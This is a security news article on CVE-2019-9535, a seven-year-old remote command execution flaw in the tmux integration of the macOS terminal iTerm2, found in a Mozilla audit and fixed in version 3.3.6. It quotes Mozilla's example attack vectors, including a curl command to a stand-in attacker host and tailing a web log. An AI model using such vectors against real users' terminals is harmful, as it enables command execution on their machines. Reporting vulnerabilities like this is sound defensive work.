7 Year-old RCE Vulnerability in macOS Terminal Emulator iTerm2 Let Hackers Execute Remote Command in Mac

Mozilla Researchers discovered a critical vulnerability in macOS Terminal Emulator iTerm2 allows attackers to connect with the SSH server to execute a command on the user’s computer.

iTerm2 terminal emulator is a replacement for macOS terminal and the successor of iTerm that supports macOS 10.12 or the newer version with a variety of features including window transparency, full-screen mode, Exposé Tabs, Growl notifications.

The critical vulnerability discovered during the source code security audit conducted by Mozilla researchers and it considers as a very critical security vulnerability that allows an attacker to execute commands on the victim’s machine by sending a specially crafted file.

The security audit conducted under Mozilla Open Source Support Program (MOSS) that continuously focusing to strengthen the open-source ecosystem and ensure its security.

“MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators),” Mozilla said.

The critical vulnerability resides in the tmux integration feature of iTerm2 for the last 7 years and if the attacker can produce the output on the victim’s terminal let attacker possible execute malicious commands on the user’s Mac computer.

According to Mozilla, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative example”.

In order to exploit the vulnerability, attackers need a user interaction which could be achieved by trick users to open a specially crafted file that they send via different mediums such as email or compromised websites.

The Vulnerability can be tracked as CVE-2019-9535 and Mozilla warns that” it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”

The vulnerability has been fixed in version 3.3.6 and all users are strongly recommended to upgrade the new version to avoid future attacks.

You can follow us on Linkedin, Twitter, Facebook for daily Cyber Security and hacking news updates.